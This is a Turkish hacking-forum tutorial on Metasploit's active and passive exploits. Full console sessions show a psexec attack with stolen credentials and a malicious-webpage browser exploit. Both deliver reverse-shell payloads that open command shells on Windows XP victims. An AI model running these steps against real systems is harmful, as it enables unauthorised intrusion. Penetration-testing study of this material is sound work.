Metasploit'te Aktif ve Pasif Exploitlerle Çalışmak

13 Nis 2022
179
113
тüяκıчe
Metasploit Çerçevesindeki tüm istismarlar iki kategoriye ayrılacaktır;
Aktif ve Pasif Olmak üzere


968135.jpg

Aktif İstismarlar

Etkin istismarlar belirli bir ana bilgisayardan yararlanır, tamamlanana kadar çalışır ve ardından çıkar.
  • Kaba kuvvet modülleri, kurbandan bir kabuk açıldığında çıkacaktır.
  • Bir hatayla karşılaşılırsa modül yürütmesi durur.
  • Exploit komutuna '-j' ileterek aktif bir modülü arka plana zorlayabilirsiniz:

Kod:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >


968135.jpg


Örnek
Aşağıdaki örnek, hedef sistemde bir ters kabuktan yararlanmak ve elde etmek için önceden edinilmiş bir kimlik bilgilerini kullanır.


Kod:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



57ef41c903da713a685ba450b701e48e2e40862a-640x380.png

Pasif İstismarlar

Pasif istismarlar, gelen ana bilgisayarları bekler ve bağlanırken onları kullanır.

968135.jpg
  • Pasif istismarlar neredeyse her zaman web tarayıcıları, FTP istemcileri vb. gibi istemcilere odaklanır.
  • Ayrıca, bağlantı bekleyen e-posta açıklarıyla birlikte kullanılabilirler.
  • Pasif açıklardan yararlanmalar, kabukları olduğu gibi bildirir, session komutuna '-l' iletilerek numaralandırılabilir. '-i' geçmek bir kabuk ile etkileşime girecektir.
Kod:
msf exploit(ani_loadimage_chunksize) > sessions -l


Active sessions
===============


  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444


msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...


meterpreter >


Örnek

Aşağıdaki çıktı, animasyonlu imleç güvenlik açığından yararlanma kurulumunu gösterir. Bir kurban kötü niyetli web sitemize göz atana kadar istismar tetiklenmez.


Kod:
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.


[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)


msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...


Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\Documents and Settings\victim\Desktop>


Saygılarımla...
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.